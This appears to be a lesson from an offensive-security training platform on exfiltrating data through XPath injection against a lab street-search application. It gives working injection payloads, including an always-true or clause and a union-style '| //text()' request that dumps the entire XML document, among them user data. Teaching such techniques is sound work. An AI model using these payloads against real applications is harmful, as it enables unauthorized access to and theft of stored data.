Injection Attacks  

XPath - Data Exfiltration


Now that we have discussed bypassing authentication using XPath injection in the previous section, we will focus on data exfiltration in this section. Specifically, we will discuss how to manipulate XPath queries such that we access arbitrary data from XML documents, using techniques similar to UNION-based SQL injections.


Simple Data Exfiltration

To demonstrate data exfiltration via XPath injection in a simple base scenario, let us consider a web application that allows us to query data about the streets in San Francisco. We can enter a search query and choose between a long and short street name. The web application displays all streets in San Francisco that match our query:

Looking at the request, we can see that the search query is sent in the GET parameter q, while our choice of a long/short street name is transmitted in the GET parameter f:

image

The web application returns all streets that contain our search query as a substring. The parameter f seems to control what property of the matching streets is displayed, which is either the complete street name or a shortened version. This reveals two node names: fullstreetname and streetname. To exploit XPath injection vulnerabilities successfully, it is crucial to attempt to understand/depict the structure of the XPath query and the accompanying XML document being queried by the web application, similar to what is done when exploiting SQL injection vulnerabilities.

From the web application's behavior, we can deduce information about the XPath query that is performed. Since we do not know the names of the element nodes in the XML document, we will denote the path by single character placeholder names a, b, c, and d. The query most likely looks like this:

/a/b/c/[contains(d/text(), 'BAR')]/fullstreetname

Note: We do not know whether the depth of the XML schema is three like depicted above (/a/b/c). We will discuss how to determine the schema depth in the next section.

In this case, the search string we provide in the GET parameter q is inserted in the predicate that filters the street name using the contains function. After that, the GET parameter f determines the property the web application displays from all matching streets, which is why it is appended at the end of the query.

From the above query, we know the XML document has to look similar to this (again, we do not know the node names, so we use the same placeholder names as above):

<a>
	<b>
		<c>
			<d>???</d>
			<streetname>BARCELONA</streetname>
			<fullstreetname>BARCELONA AVE</fullstreetname>
		</c>
	</b>
</a>

Confirming XPath Injection

We can confirm XPath injection by sending the payload SOMETHINGINVALID') or ('1'='1 in the q parameter. This would result in the following XPath query:

/a/b/c/[contains(d/text(), 'SOMETHINGINVALID') or ('1'='1')]

While our provided substring is invalid, the injected or clause evaluates to true such that the predicate becomes universally true. Therefore, it matches all nodes at that depth. If we send this payload, the web application responds with all street names, thus confirming the XPath injection vulnerability:

image

Exfiltrating Data

How can we exploit this XPath injection to exfiltrate data apart from the street data? The easiest way is to construct a query that returns the entire XML document so that we can search it for interesting information. There are multiple different ways to achieve this. However, the simplest is probably to append a new query that returns all text nodes. We can do this with a request like this:

GET /index.php?q=SOMETHINGINVALID&f=fullstreetname+|+//text() HTTP/1.1
Host: xpath-exfil.htb


The web application will then execute the following query:

/a/b/c/[contains(d/text(), 'SOMETHINGINVALID')]/fullstreetname | //text()

We are appending a second query with the | operator, similar to a UNION-based SQL injection. The second query, //text(), returns all text nodes in the XML document. Therefore, the response contains all data stored in the XML document. Depending on the size of the XML document, the response can be pretty large. Thus it may take some time to look through the data carefully. In our example, we can find a user data set at the end of the document after the data set containing information about the streets of San Francisco:

image

Thus, we successfully exploited XPath injection to exfiltrate the entire XML document.

We could also achieve the same result by using this payload in the q parameter: SOMETHINGINVALID') or ('1'='1 and setting the f parameter to ../../..//text(). This would result in the following XPath query:

/a/b/c/[contains(d/text(), 'SOMETHINGINVALID') or ('1'='1')]/../../..//text()

The predicate is universally true due to our injected or clause. Furthermore, our payload injected into the f parameter moves back up to the document's root and selects all text nodes, just like our previous payload. Thus, this query also returns the entire XML document.

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Click here to spawn the target system!

Target: Click here to spawn the target system!

+10 Streak pts

Previous

+10 Streak pts

Next